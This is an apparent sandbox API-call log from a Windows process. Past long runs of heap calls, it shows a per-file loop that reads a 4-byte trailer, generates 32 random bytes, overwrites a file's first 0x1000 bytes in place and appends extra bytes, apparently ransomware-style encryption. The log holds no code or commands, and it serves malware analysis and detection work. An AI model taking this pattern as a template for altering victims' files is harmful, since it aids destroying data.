[0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.406] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.407] GetProcessHeap () returned 0x4f10000 [0083.407] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.408] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.408] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.409] GetProcessHeap () returned 0x4f10000 [0083.409] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.409] SetFilePointerEx (in: hFile=0x940, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.409] WriteFile (in: hFile=0x940, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.410] WriteFile (in: hFile=0x940, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.410] GetProcessHeap () returned 0x4f10000 [0083.410] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.410] GetProcessHeap () returned 0x4f10000 [0083.410] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.410] GetProcessHeap () returned 0x4f10000 [0083.410] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.410] CloseHandle (hObject=0x940) returned 1 [0083.411] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 112 [0083.411] SetFilePointerEx (in: hFile=0x944, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.411] ReadFile (in: hFile=0x944, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.411] SetFilePointerEx (in: hFile=0x944, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.411] GetProcessHeap () returned 0x4f10000 [0083.411] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.411] GetProcessHeap () returned 0x4f10000 [0083.411] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0083.411] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0083.411] GetProcessHeap () returned 0x4f10000 [0083.411] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b610d8 [0083.411] ReadFile (in: hFile=0x944, lpBuffer=0x8b610d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesRead=0x84afd08*=0x1000, lpOverlapped=0x0) returned 1 [0083.460] SetFilePointerEx (in: hFile=0x944, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.460] WriteFile (in: hFile=0x944, lpBuffer=0x8b610d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x8b610d8*, lpNumberOfBytesWritten=0x84afd44*=0x1000, lpOverlapped=0x0) returned 1 [0083.460] GetProcessHeap () returned 0x4f10000 [0083.460] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0083.460] GetProcessHeap () returned 0x4f10000 [0083.460] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.461] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.461] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.462] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0083.462] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.463] GetProcessHeap () returned 0x4f10000 [0083.463] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.464] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.464] GetProcessHeap () returned 0x4f10000 [0083.465] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0083.465] GetProcessHeap () returned 0x4f10000 [0083.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0083.465] GetProcessHeap () returned 0x4f10000 [0083.465] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0083.465] GetProcessHeap () returned 0x4f10000 [0083.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0083.465] GetProcessHeap () returned 0x4f10000 [0083.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0083.465] GetProcessHeap () returned 0x4f10000 [0083.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0083.465] GetProcessHeap () returned 0x4f10000 [0083.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0083.465] GetProcessHeap () returned 0x4f10000 [0083.465] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0083.465] SetFilePointerEx (in: hFile=0x944, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.465] WriteFile (in: hFile=0x944, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x84afd44*=0x100, lpOverlapped=0x0) returned 1 [0083.466] WriteFile (in: hFile=0x944, lpBuffer=0x84afd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x84afd44, lpOverlapped=0x0 | out: lpBuffer=0x84afd48*, lpNumberOfBytesWritten=0x84afd44*=0x4, lpOverlapped=0x0) returned 1 [0083.466] GetProcessHeap () returned 0x4f10000 [0083.466] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b610d8 | out: hHeap=0x4f10000) returned 1 [0083.466] GetProcessHeap () returned 0x4f10000 [0083.466] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0083.466] GetProcessHeap () returned 0x4f10000 [0083.466] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0083.466] CloseHandle (hObject=0x944) returned 1 [0083.467] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 113 [0083.467] SetFilePointerEx (in: hFile=0x948, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.467] ReadFile (in: hFile=0x948, lpBuffer=0x84afd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x84afd08, lpOverlapped=0x0 | out: lpBuffer=0x84afd4c*, lpNumberOfBytesRead=0x84afd08*=0x0, lpOverlapped=0x0) returned 1 [0083.467] SetFilePointerEx (in: hFile=0x948, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.467] GetProcessHeap () returned 0x4f10000 [0083.467] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0083.467] GetProcessHeap () 